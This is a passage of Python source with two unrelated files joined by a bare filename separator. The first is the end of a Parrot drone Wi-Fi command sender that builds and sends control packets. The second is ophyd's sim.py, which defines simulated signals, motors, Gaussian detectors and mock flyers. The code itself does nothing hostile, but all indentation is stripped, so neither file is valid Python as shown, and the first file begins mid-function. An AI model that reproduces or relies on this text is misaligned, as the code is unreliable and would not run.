#self.udp_send_sock.connect((self.drone_ip, self.udp_send_port))
try_num += 1
def send_command_packet_ack(self, packet, seq_id):
"""
Sends the actual packet on the ack channel. Internal function only.
:param packet: packet constructed according to the command rules (variable size, constructed elsewhere)
:return: True if the command was sent and False otherwise
"""
try_num = 0
self._set_command_received('SEND_WITH_ACK', False, seq_id)
while (try_num < self.max_packet_retries and not self._is_command_received('SEND_WITH_ACK', seq_id)):
color_print("sending packet on try %d", try_num)
self.safe_send(packet)
try_num += 1
self.smart_sleep(0.5)
return self._is_command_received('SEND_WITH_ACK', seq_id)
def send_command_packet_noack(self, packet):
"""
Sends the actual packet on the No-ack channel. Internal function only.
:param packet: packet constructed according to the command rules (variable size, constructed elsewhere)
:return: True if the command was sent and False otherwise
"""
try_num = 0
color_print("sending packet on try %d", try_num)
self.safe_send(packet)
def send_noparam_command_packet_ack(self, command_tuple):
"""
Send a no parameter command packet on the ack channel
:param command_tuple:
:return:
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBH", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 11,
command_tuple[0], command_tuple[1], command_tuple[2])
self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
def send_param_command_packet(self, command_tuple, param_tuple=None, param_type_tuple=0,ack=True):
"""
Send a command packet with parameters. Ack channel is optional for future flexibility,
but currently commands are always send over the Ack channel so it defaults to True.
Contributed by awm102 on github
:param: command_tuple: the command tuple derived from command_parser.get_command_tuple()
:param: param_tuple (optional): the parameter values to be sent (can be found in the XML files)
:param: param_size_tuple (optional): a tuple of strings representing the data type of the parameters
e.g. u8, float etc. (can be found in the XML files)
:param: ack (optional): allows ack to be turned off if required
:return:
"""
# TODO: This function could potentially be extended to encompass send_noparam_command_packet_ack
# and send_enum_command_packet_ack if desired for more modular code.
# TODO: The function could be improved by looking up the parameter data types in the xml files
# in the same way the send_enum_command_packet_ack does.
# Create lists to store the number of bytes and pack chars needed for parameters
# Default them to zero so that if no params are provided the packet size is correct
param_size_list = [0] * len(param_tuple)
pack_char_list = [0] * len(param_tuple)
if param_tuple is not None:
# Fetch the parameter sizes. By looping over the param_tuple we only get the data
# for requested parameters so a mismatch in params and types does not matter
for i,param in enumerate(param_tuple):
pack_char_list[i], param_size_list[i] = get_data_format_and_size(param, param_type_tuple[i])
if ack:
ack_string = 'SEND_WITH_ACK'
data_ack_string = 'DATA_WITH_ACK'
else:
ack_string = 'SEND_NO_ACK'
data_ack_string = 'DATA_NO_ACK'
# Construct the base packet
self.sequence_counter[ack_string] = (self.sequence_counter[ack_string] + 1) % 256
# Calculate packet size:
# base packet <BBBIBBH is 11 bytes, param_size_list can be added up
packet_size = 11 + sum(param_size_list)
packet = struct.pack("<BBBIBBH", self.data_types_by_name[data_ack_string],
self.buffer_ids[ack_string],
self.sequence_counter[ack_string], packet_size,
command_tuple[0], command_tuple[1], command_tuple[2])
if param_tuple is not None:
# Add in the parameter values based on their sizes
for i,param in enumerate(param_tuple):
packet += struct.pack(pack_char_list[i],param)
if ack:
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
else:
return self.send_command_packet_noack(packet)
def send_pcmd_command(self, command_tuple, roll, pitch, yaw, vertical_movement, duration):
"""
Send the PCMD command with the specified roll, pitch, and yaw
:param command_tuple: command tuple per the parser
:param roll:
:param pitch:
:param yaw:
:param vertical_movement:
:param duration:
"""
start_time = time.time()
while (time.time() - start_time < duration):
self.sequence_counter['SEND_NO_ACK'] = (self.sequence_counter['SEND_NO_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHBbbbbI",
self.data_types_by_name['DATA_NO_ACK'],
self.buffer_ids['SEND_NO_ACK'],
self.sequence_counter['SEND_NO_ACK'],
20,
command_tuple[0], command_tuple[1], command_tuple[2],
1, roll, pitch, yaw, vertical_movement, 0)
self.safe_send(packet)
self.smart_sleep(0.1)
def send_fly_relative_command(self, command_tuple, change_x, change_y, change_z, change_angle):
"""
Send the packet to fly relative (this is Bebop only).
:param command_tuple: command tuple per the parser
:param change_x: change in x
:param change_y: change in y
:param change_z: change in z
:param change_angle: change in angle
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHffff",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
27,
command_tuple[0], command_tuple[1], command_tuple[2],
change_x, change_y, change_z, change_angle)
self.safe_send(packet)
def send_turn_command(self, command_tuple, degrees):
"""
Build the packet for turning and send it
:param command_tuple: command tuple from the parser
:param degrees: how many degrees to turn
:return: True if the command was sent and False otherwise
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHh",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
13,
command_tuple[0], command_tuple[1], command_tuple[2],
degrees)
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
def send_camera_move_command(self, command_tuple, pan, tilt):
"""
Send the packet to move the camera (this is Bebop only).
:param command_tuple: command tuple per the parser
:param pan:
:param tilt:
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHff",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
19,
command_tuple[0], command_tuple[1], command_tuple[2],
pan, tilt)
self.safe_send(packet)
def send_enum_command_packet_ack(self, command_tuple, enum_value, usb_id=None):
"""
Send a command on the ack channel with enum parameters as well (most likely a flip).
All commandsandsensors except PCMD go on the ack channel per
http://forum.developer.parrot.com/t/ble-characteristics-of-minidrones/5912/2
the id of the last command sent (for use in ack) is the send counter (which is incremented before sending)
:param command_tuple: 3 tuple of the command bytes. 0 padded for 4th byte
:param enum_value: the enum index
:return: nothing
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
if (usb_id is None):
packet = struct.pack("<BBBIBBHI", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 15,
command_tuple[0], command_tuple[1], command_tuple[2],
enum_value)
else:
packet = struct.pack("<BBBIBBHBI", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 16,
command_tuple[0], command_tuple[1], command_tuple[2],
usb_id, enum_value)
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
def smart_sleep(self, timeout):
"""
Sleeps the requested number of seconds but wakes up for notifications
Note: NEVER use regular time.sleep! It is a blocking sleep and it will likely
cause the WIFI to disconnect due to dropped notifications. Always use smart_sleep instead!
:param timeout: number of seconds to sleep
:return:
"""
start_time = time.time()
while (time.time() - start_time < timeout):
time.sleep(0.1)
def ack_packet(self, buffer_id, packet_id):
"""
Ack the packet id specified by the argument on the ACK_COMMAND channel
:param packet_id: the packet id to ack
:return: nothing
"""
#color_print("ack: buffer id of %d and packet id of %d" % (buffer_id, packet_id))
new_buf_id = (buffer_id + 128) % 256
if (new_buf_id not in self.sequence_counter):
self.sequence_counter[new_buf_id] = 0
else:
self.sequence_counter[new_buf_id] = (self.sequence_counter[new_buf_id] + 1) % 256
packet = struct.pack("<BBBIB", self.data_types_by_name['ACK'], new_buf_id,
self.sequence_counter[new_buf_id], 8,
packet_id)
self.safe_send(packet)
|
sim.py
|
import copy
import inspect
import itertools
from functools import partial
import numpy as np
import os
import random
import threading
import time as ttime
import uuid
import weakref
import warnings
from collections import deque, OrderedDict
from tempfile import mkdtemp
from .signal import Signal, EpicsSignal, EpicsSignalRO
from .areadetector.base import EpicsSignalWithRBV
from .status import DeviceStatus, StatusBase
from .device import (Device, Component as Cpt,
DynamicDeviceComponent as DDCpt, Kind)
from types import SimpleNamespace
from .pseudopos import (PseudoPositioner, PseudoSingle,
real_position_argument, pseudo_position_argument)
from .positioner import SoftPositioner
from .utils import ReadOnlyError, LimitError
from .log import logger
# two convenience functions 'vendored' from bluesky.utils
def new_uid():
return str(uuid.uuid4())
def short_uid(label=None, truncate=6):
"Return a readable but unique id like 'label-fjfi5a'"
if label:
return '-'.join([label, new_uid()[:truncate]])
else:
return new_uid()[:truncate]
class NullStatus(StatusBase):
"A simple Status object that is always immediately done, successfully."
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.set_finished()
class EnumSignal(Signal):
def __init__(self, *args, value=0, enum_strings, **kwargs):
super().__init__(*args, value=0, **kwargs)
self._enum_strs = tuple(enum_strings)
self._metadata['enum_strs'] = tuple(enum_strings)
self.put(value)
def put(self, value, **kwargs):
if value in self._enum_strs:
value = self._enum_strs.index(value)
elif isinstance(value, str):
err = f'{value} not in enum strs {self._enum_strs}'
raise ValueError(err)
return super().put(value, **kwargs)
def get(self, *, as_string=True, **kwargs):
"""
Implement getting as enum strings
"""
value = super().get()
if as_string:
if self._enum_strs is not None and isinstance(value, int):
return self._enum_strs[value]
elif value is not None:
return str(value)
return value
def describe(self):
desc = super().describe()
desc[self.name]['enum_strs'] = self._enum_strs
return desc
class SynSignal(Signal):
"""
A synthetic Signal that evaluates a Python function when triggered.
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal does not change the value.
name : string, keyword only
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
precision : integer, optional
Digits of precision. Default is 3.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
kind : a member the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
# This signature is arranged to mimic the signature of EpicsSignal, where
# the Python function (func) takes the place of the PV.
def __init__(self, func=None, *,
name, # required, keyword-only
exposure_time=0,
precision=3,
parent=None,
labels=None,
kind=None,
**kwargs):
if func is None:
# When triggered, just put the current value.
func = self.get
# Initialize readback with 0.
self._readback = 0
sentinel = object()
loop = kwargs.pop('loop', sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2
)
self._func = func
self.exposure_time = exposure_time
self.precision = precision
super().__init__(value=self._func(), timestamp=ttime.time(), name=name,
parent=parent, labels=labels, kind=kind, **kwargs)
self._metadata.update(
connected=True,
)
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of generality....
for k in res:
res[k]['precision'] = self.precision
return res
def trigger(self):
st = DeviceStatus(device=self)
delay_time = self.exposure_time
if delay_time:
def sleep_and_finish():
self.log.info('sleep_and_finish %s', self)
ttime.sleep(delay_time)
self.put(self._func())
st.set_finished()
threading.Thread(target=sleep_and_finish, daemon=True).start()
else:
self.put(self._func())
st.set_finished()
return st
def sim_set_func(self, func):
"""
Update the SynSignal function to set a new value on trigger.
"""
self._func = func
class SynSignalRO(SynSignal):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._metadata.update(
connected=True,
write_access=False,
)
def put(self, value, *, timestamp=None, force=False):
msg = f"{self}.put(value={value}, timestamp={timestamp}, force={force})"
self.log.error(msg)
raise ReadOnlyError(msg)
def set(self, value, *, timestamp=None, force=False):
msg = f"{self} is readonly"
self.log.error(msg)
raise ReadOnlyError(msg)
class SynPeriodicSignal(SynSignal):
"""
A synthetic Signal that evaluates a Python function periodically.
The signal value is updated in a background thread. To start the thread,
call the `start_simulation()` method before the beginning of simulation.
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal generates white noise on [0, 1].
name : string, keyword only
period : number, optional
How often the Signal's value is updated in the background. Default is
1 second.
period_jitter : number, optional
Random Gaussian variation of the period. Default is 1 second.
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
kind : a member the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
def __init__(self, func=None, *,
name, # required, keyword-only
period=1, period_jitter=1,
exposure_time=0,
parent=None,
labels=None,
kind=None,
**kwargs):
if func is None:
func = np.random.rand
self._period = period
self._period_jitter = period_jitter
super().__init__(name=name, func=func,
exposure_time=exposure_time,
parent=parent, labels=labels, kind=kind,
**kwargs)
self.__thread = None
def start_simulation(self):
"""
Start background thread that performs periodic value updates. The method
should be called at least once before the beginning of simulation. Multiple
calls to the method are ignored.
"""
if self.__thread is None:
def periodic_update(ref, period, period_jitter):
while True:
signal = ref()
if not signal:
# Our target Signal has been garbage collected. Shut
# down the Thread.
return
signal.put(signal._func())
del signal
# Sleep for period +/- period_jitter.
ttime.sleep(
max(self._period + self._period_jitter * np.random.randn(), 0))
self.__thread = threading.Thread(target=periodic_update,
daemon=True,
args=(weakref.ref(self),
self._period,
self._period_jitter))
self.__thread.start()
def _start_simulation_deprecated(self):
"""Call `start_simulation` and print deprecation warning."""
if self.__thread is None:
msg = ("Deprecated API: Objects of SynPeriodicSignal must be initialized before simulation\n"
"by calling 'start_simulation()' method. Two such objects ('rand' and 'rand2') are\n"
"created by 'ophyd.sim' module. Call\n"
" rand.start_simulation() or rand2.start_simulation()\n"
"before the object is used.")
self.log.warning(msg)
self.start_simulation()
def trigger(self):
self._start_simulation_deprecated()
return super().trigger()
def get(self, **kwargs):
self._start_simulation_deprecated()
return super().get(**kwargs)
def put(self, *args, **kwargs):
self._start_simulation_deprecated()
super().put(*args, **kwargs)
def set(self, *args, **kwargs):
self._start_simulation_deprecated()
return super().set(*args, **kwargs)
def read(self):
self._start_simulation_deprecated()
return super().read()
def subscribe(self, *args, **kwargs):
self._start_simulation_deprecated()
return super().subscribe(*args, **kwargs)
class _ReadbackSignal(Signal):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._metadata.update(
connected=True,
write_access=False,
)
def get(self):
self._readback = self.parent.sim_state['readback']
return self._readback
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of
# generality....
for k in res:
res[k]['precision'] = self.parent.precision
return res
@property
def timestamp(self):
'''Timestamp of the readback value'''
return self.parent.sim_state['readback_ts']
def put(self, value, *, timestamp=None, force=False):
raise ReadOnlyError("The signal {} is readonly.".format(self.name))
def set(self, value, *, timestamp=None, force=False):
raise ReadOnlyError("The signal {} is readonly.".format(self.name))
class _SetpointSignal(Signal):
def put(self, value, *, timestamp=None, force=False):
self._readback = float(value)
self.parent.set(float(value))
def get(self):
self._readback = self.parent.sim_state['setpoint']
return self.parent.sim_state['setpoint']
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of generality....
for k in res:
res[k]['precision'] = self.parent.precision
return res
@property
def timestamp(self):
'''Timestamp of the readback value'''
return self.parent.sim_state['setpoint_ts']
class SynAxis(Device):
"""
A synthetic settable Device mimic any 1D Axis (position, temperature).
Parameters
----------
name : string, keyword only
readback_func : callable, optional
When the Device is set to ``x``, its readback will be updated to
``f(x)``. This can be used to introduce random noise or a systematic
offset.
Expected signature: ``f(x) -> value``.
value : object, optional
The initial value. Default is 0.
delay : number, optional
Simulates how long it takes the device to "move". Default is 0 seconds.
precision : integer, optional
Digits of precision. Default is 3.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
kind : a member the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
readback = Cpt(_ReadbackSignal, value=0, kind='hinted')
setpoint = Cpt(_SetpointSignal, value=0, kind='normal')
velocity = Cpt(Signal, value=1, kind='config')
acceleration = Cpt(Signal, value=1, kind='config')
unused = Cpt(Signal, value=1, kind='omitted')
SUB_READBACK = 'readback'
_default_sub = SUB_READBACK
def __init__(self, *,
name,
readback_func=None, value=0, delay=0,
precision=3,
parent=None,
labels=None,
kind=None,
**kwargs):
if readback_func is None:
def readback_func(x):
return x
sentinel = object()
loop = kwargs.pop('loop', sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2
)
self.sim_state = {}
self._readback_func = readback_func
self.delay = delay
self.precision = precision
# initialize values
self.sim_state['setpoint'] = value
self.sim_state['setpoint_ts'] = ttime.time()
self.sim_state['readback'] = readback_func(value)
self.sim_state['readback_ts'] = ttime.time()
super().__init__(name=name, parent=parent, labels=labels, kind=kind,
**kwargs)
self.readback.name = self.name
def set(self, value):
old_setpoint = self.sim_state['setpoint']
self.sim_state['setpoint'] = value
self.sim_state['setpoint_ts'] = ttime.time()
self.setpoint._run_subs(sub_type=self.setpoint.SUB_VALUE,
old_value=old_setpoint,
value=self.sim_state['setpoint'],
timestamp=self.sim_state['setpoint_ts'])
def update_state():
old_readback = self.sim_state['readback']
self.sim_state['readback'] = self._readback_func(value)
self.sim_state['readback_ts'] = ttime.time()
self.readback._run_subs(sub_type=self.readback.SUB_VALUE,
old_value=old_readback,
value=self.sim_state['readback'],
timestamp=self.sim_state['readback_ts'])
self._run_subs(sub_type=self.SUB_READBACK,
old_value=old_readback,
value=self.sim_state['readback'],
timestamp=self.sim_state['readback_ts'])
st = DeviceStatus(device=self)
if self.delay:
def sleep_and_finish():
ttime.sleep(self.delay)
update_state()
st.set_finished()
threading.Thread(target=sleep_and_finish, daemon=True).start()
else:
update_state()
st.set_finished()
return st
@property
def position(self):
return self.readback.get()
class SynAxisEmptyHints(SynAxis):
@property
def hints(self):
return {}
class SynAxisNoHints(SynAxis):
readback = Cpt(_ReadbackSignal, value=0, kind='omitted')
@property
def hints(self):
raise AttributeError
class SynGauss(Device):
"""
Evaluate a point on a Gaussian based on the value of a motor.
Parameters
----------
name : string
motor : Device
motor_field : string
center : number
center of peak
Imax : number
max intensity of peak
sigma : number, optional
Default is 1.
noise : {'poisson', 'uniform', None}, optional
Add noise to the gaussian peak.
noise_multiplier : float, optional
Only relevant for 'uniform' noise. Multiply the random amount of
noise by 'noise_multiplier'
random_state : numpy random state object, optional
np.random.RandomState(0), to generate random number with given seed
Example
-------
motor = SynAxis(name='motor')
det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1)
"""
def _compute(self):
m = self._motor.read()[self._motor_field]['value']
# we need to do this one at a time because
# - self.read() may be screwed with by the user
# - self.get() would cause infinite recursion
Imax = self.Imax.get()
center = self.center.get()
sigma = self.sigma.get()
noise = self.noise.get()
noise_multiplier = self.noise_multiplier.get()
v = Imax * np.exp(-(m - center) ** 2 /
(2 * sigma ** 2))
if noise == 'poisson':
v = int(self.random_state.poisson(np.round(v), 1))
elif noise == 'uniform':
v += self.random_state.uniform(-1, 1) * noise_multiplier
return v
val = Cpt(SynSignal, kind='hinted')
Imax = Cpt(Signal, value=10, kind='config')
center = Cpt(Signal, value=0, kind='config')
sigma = Cpt(Signal, value=1, kind='config')
noise = Cpt(EnumSignal, value='none', kind='config',
enum_strings=('none', 'poisson', 'uniform'))
noise_multiplier = Cpt(Signal, value=1, kind='config')
def __init__(self, name, motor, motor_field, center, Imax,
*, random_state=None,
**kwargs):
set_later = {}
for k in ('sigma', 'noise', 'noise_multiplier'):
v = kwargs.pop(k, None)
if v is not None:
set_later[k] = v
super().__init__(name=name, **kwargs)
self._motor = motor
self._motor_field = motor_field
self.center.put(center)
self.Imax.put(Imax)
self.random_state = random_state or np.random
self.val.name = self.name
self.val.sim_set_func(self._compute)
for k, v in set_later.items():
getattr(self, k).put(v)
self.trigger()
def subscribe(self, *args, **kwargs):
return self.val.subscribe(*args, **kwargs)
def clear_sub(self, cb, event_type=None):
return self.val.clear_sub(cb, event_type=event_type)
def unsubscribe(self, cid):
return self.val.unsubscribe(cid)
def unsubscribe_all(self):
return self.val.unsubscribe_all()
def trigger(self, *args, **kwargs):
return self.val.trigger(*args, **kwargs)
@property
def precision(self):
return self.val.precision
@precision.setter
def precision(self, v):
self.val.precision = v
@property
def exposure_time(self):
return self.val.exposure_time
@exposure_time.setter
def exposure_time(self, v):
self.val.exposure_time = v
class Syn2DGauss(Device):
"""
Evaluate a point on a Gaussian based on the value of a motor.
Parameters
----------
name : str
The name of the detector
motor0 : SynAxis
The 'x' coordinate of the 2-D gaussian blob
motor_field0 : str
The name field of the motor. Should be the key in motor0.describe()
motor1 : SynAxis
The 'y' coordinate of the 2-D gaussian blob
motor_field1 : str
The name field of the motor. Should be the key in motor1.describe()
center : iterable, optional
The center of the gaussian blob
Defaults to (0,0)
Imax : float, optional
The intensity at `center`
Defaults to 1
sigma : float, optional
Standard deviation for gaussian blob
Defaults to 1
noise : {'poisson', 'uniform', None}, optional
Add noise to the gaussian peak..
Defaults to None
noise_multiplier : float, optional
Only relevant for 'uniform' noise. Multiply the random amount of
noise by 'noise_multiplier'
Defaults to 1
random_state : numpy random state object, optional
np.random.RandomState(0), to generate random number with given seed
Example
-------
motor = SynAxis(name='motor')
det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1)
"""
val = Cpt(SynSignal, kind='hinted')
Imax = Cpt(Signal, value=10, kind='config')
center = Cpt(Signal, value=0, kind='config')
sigma = Cpt(Signal, value=1, kind='config')
noise = Cpt(EnumSignal, value='none', kind='config',
enum_strings=('none', 'poisson', 'uniform'))
noise_multiplier = Cpt(Signal, value=1, kind='config')
def _compute(self):
x = self._motor0.read()[self._motor_field0]['value']
y = self._motor1.read()[self._motor_field1]['value']
m = np.array([x, y])
Imax = self.Imax.get()
center = self.center.get()
sigma = self.sigma.get()
noise = self.noise.get()
noise_multiplier = self.noise_multiplier.get()
v = Imax * np.exp(-np.sum((m - center) ** 2) / (2 * sigma ** 2))
if noise == 'poisson':
v = int(self.random_state.poisson(np.round(v), 1))
elif noise == 'uniform':
v += self.random_state.uniform(-1, 1) * noise_multiplier
return v
def __init__(self, name, motor0, motor_field0, motor1, motor_field1,
center, Imax, sigma=1, noise="none", noise_multiplier=1,
random_state=None, **kwargs):
super().__init__(name=name, **kwargs)
self._motor0 = motor0
self._motor1 = motor1
self._motor_field0 = motor_field0
self._motor_field1 = motor_field1
self.center.put(center)
self.Imax.put(Imax)
self.sigma.put(sigma)
self.noise.put(noise)
self.noise_multiplier.put(noise_multiplier)
if random_state is None:
random_state = np.random
self.random_state = random_state
self.val.name = self.name
self.val.sim_set_func(self._compute)
self.trigger()
def trigger(self, *args, **kwargs):
return self.val.trigger(*args, **kwargs)
class TrivialFlyer:
"""Trivial flyer that complies to the API but returns empty data."""
name = 'trivial_flyer'
parent = None
def kickoff(self):
return NullStatus()
def describe_collect(self):
return {'stream_name': {}}
def read_configuration(self):
return OrderedDict()
def describe_configuration(self):
return OrderedDict()
def complete(self):
return NullStatus()
def collect(self):
for i in range(100):
yield {'data': {}, 'timestamps': {}, 'time': i, 'seq_num': i}
def stop(self, *, success=False):
pass
class NewTrivialFlyer(TrivialFlyer):
"""
The old-style API inserted Resource and Datum documents into a database
directly. The new-style API only caches the documents and provides an
interface (collect_asset_docs) for accessing that cache. This change was
part of the "asset refactor" that changed that way Resource and Datum
documents flowed through ophyd, bluesky, and databroker. Trivial flyer that
complies to the API but returns empty data.
"""
name = 'new_trivial_flyer'
def collect_asset_docs(self):
for _ in ():
yield _
class MockFlyer:
"""
Class for mocking a flyscan API implemented with stepper motors.
"""
def __init__(self, name, detector, motor, start, stop, num, **kwargs):
self.name = name
self.parent = None
self._mot = motor
self._detector = detector
self._steps = np.linspace(start, stop, num)
self._data = deque()
self._completion_status = None
self._lock = threading.RLock()
sentinel = object()
loop = kwargs.pop("loop", sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2,
)
if kwargs:
raise TypeError(
f"{self.__class__}.__init__ got unexpected "
f"keyword arguments {list(kwargs)}"
)
def __setstate__(self, val):
name, detector, motor, steps = val
self.name = name
self.parent = None
self._mot = motor
self._detector = detector
self._steps = steps
self._completion_status = None
def __getstate__(self):
return (self.name, self._detector, self._mot, self._steps)
def read_configuration(self):
return {}
def describe_configuration(self):
return {}
def describe_collect(self):
dd = dict()
dd.update(self._mot.describe())
dd.update(self._detector.describe())
return {self.name: dd}
def complete(self):
if self._completion_status is None:
raise RuntimeError("No collection in progress")
return self._completion_status
def kickoff(self):
if self._completion_status is not None and not self._completion_status.done:
raise RuntimeError("Kicking off a second time?!")
self._data = deque()
st = DeviceStatus(device=self)
self._completion_status = st
def flyer_worker():
self._scan()
st.set_finished()
threading.Thread(target=flyer_worker, daemon=True).start()
kickoff_st = DeviceStatus(device=self)
kickoff_st.set_finished()
return kickoff_st
def collect(self):
with self._lock:
data = list(self._data)
self._data.clear()
yield from data
def _scan(self):
"This will be run on a separate thread, started in self.kickoff()"
ttime.sleep(0.1)
for p in self._steps:
stat = self._mot.set(p)
stat.wait()
stat = self._detector.trigger()
stat.wait()
event = dict()
event["time"] = ttime.time()
event["data"] = dict()
event["timestamps"] = dict()
for r in [self._mot, self._detector]:
d = r.read()
for k, v in d.items():
event["data"][k] = v["value"]
event["timestamps"][k] = v["timestamp"]
with self._lock:
self._data.append(event)
def stop(self, *, success=False):
pass
class SynSignalWithRegistry(SynSignal):
"""
A SynSignal integrated with databroker.assets
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal does not change the value.
name : string, keyword only
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
reg : Registry, optional
DEPRECATED. If used, this is ignored and a warning is issued. In a
future release, this parameter will be removed.
save_path : str, optional
Path to save files to, if None make a temp dir, defaults to None.
save_func : function, optional
The function to save the data, function signature must be:
`func(file_path, array)`, defaults to np.save
save_spec : str, optional
The spec for the save function, defaults to 'RWFS_NPY'
save_ext : str, optional
The extension to add to the file name, defaults to '.npy'
"""
def __init__(self, *args, save_path=None,
save_func=partial(np.save, allow_pickle=False),
save_spec='NPY_SEQ', save_ext='npy', **kwargs):
super().__init__(*args, **kwargs)
self.save_func = save_func
self.save_ext = save_ext
self._resource_uid = None
self._datum_counter = None
self._asset_docs_cache = deque()
if save_path is None:
self.save_path = mkdtemp()
else:
self.save_path = save_path
self._spec = save_spec # spec name stored in resource doc
self._file_stem = None
self._path_stem = None
self._result = {}
def stage(self):
self._file_stem = short_uid()
self._datum_counter = itertools.count()
self._path_stem = os.path.join(self.save_path, self._file_stem)
# This is temporarily more complicated than it will be in the future.
# It needs to support old configurations that have a registry.
resource = {'spec': self._spec,
'root': self.save_path,
'resource_path': self._file_stem,
'resource_kwargs': {},
'path_semantics': {'posix': 'posix', 'nt': 'windows'}[os.name]}
self._resource_uid = new_uid()
resource['uid'] = self._resource_uid
self._asset_docs_cache.append(('resource', resource))
def trigger(self):
super().trigger()
# save file stash file name
self._result.clear()
for idx, (name, reading) in enumerate(super().read().items()):
# Save the actual reading['value'] to disk. For a real detector,
# this part would be done by the detector IOC, not by ophyd.
data_counter = next(self._datum_counter)
self.save_func('{}_{}.{}'.format(self._path_stem, data_counter,
self.save_ext), reading['value'])
# This is temporarily more complicated than it will be in the
# future. It needs to support old configurations that have a
# registry.
datum = {'resource': self._resource_uid,
'datum_kwargs': dict(index=data_counter)}
# If a Registry is not set, we need to generate the datum_id.
datum_id = '{}/{}'.format(self._resource_uid,
data_counter)
datum['datum_id'] = datum_id
self._asset_docs_cache.append(('datum', datum))
# And now change the reading in place, replacing the value with
# a reference to Registry.
reading['value'] = datum_id
self._result[name] = reading
return NullStatus()
def read(self):
return self._result
def describe(self):
res = super().describe()
for key in res:
res[key]['external'] = "FILESTORE"
return res
def collect_asset_docs(self):
items = list(self._asset_docs_cache)
self._asset_docs_cache.clear()
for item in items:
yield item
def unstage(self):
self._resource_uid = None
self._datum_counter = None
self._asset_docs_cache.clear()
self._file_stem = None
self._path_stem = None
self._result.clear()
class NumpySeqHandler:
specs = {'NPY_SEQ'}
def __init__(self, filename, root=''):
self._name = os.path.join(root, filename)
def __call__(self, index):
return np.load('{}_{}.npy'.format(self._name, index),
allow_pickle=False)
def get_file_list(self, datum_kwarg_gen):
"This method is optional. It is not needed for access, but for export."
return ['{name}_{index}.npy'.format(name=self._name, **kwargs)
for kwargs in datum_kwarg_gen]
class ABDetector(Device):
a = Cpt(SynSignal, func=random.random, kind=Kind.hinted)
b = Cpt(SynSignal, func=random.random)
def trigger(self):
return self.a.trigger() & self.b.trigger()
class DetWithCountTime(Device):
intensity = Cpt(SynSignal, func=lambda: 0, kind=Kind.hinted)
count_time = Cpt(Signal)
class DetWithConf(Device):
a = Cpt(SynSignal, func=lambda: 1, kind=Kind.hinted)
b = Cpt(SynSignal, func=lambda: 2, kind=Kind.hinted)
c = Cpt(SynSignal, func=lambda: 3)
d = Cpt(SynSignal, func=lambda: 4)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.read_attrs = ['a', 'b']
self.configuration_attrs = ['c', 'd']
def trigger(self):
return self.a.trigger() & self.b.trigger()
class InvariantSignal(SynSignal):
# Always returns the same reading, including timestamp.
def read(self):
res = super().read()
for k in res:
res[k]['timestamp'] = 0
return res
def __repr__(self):
return "<INVARIANT REPR>"
class SPseudo3x3(PseudoPositioner):
pseudo1 = Cpt(PseudoSingle, limits=(-10, 10), egu='a', kind=Kind.hinted)
pseudo2 = Cpt(PseudoSingle, limits=(-10, 10), egu='b', kind=Kind.hinted)
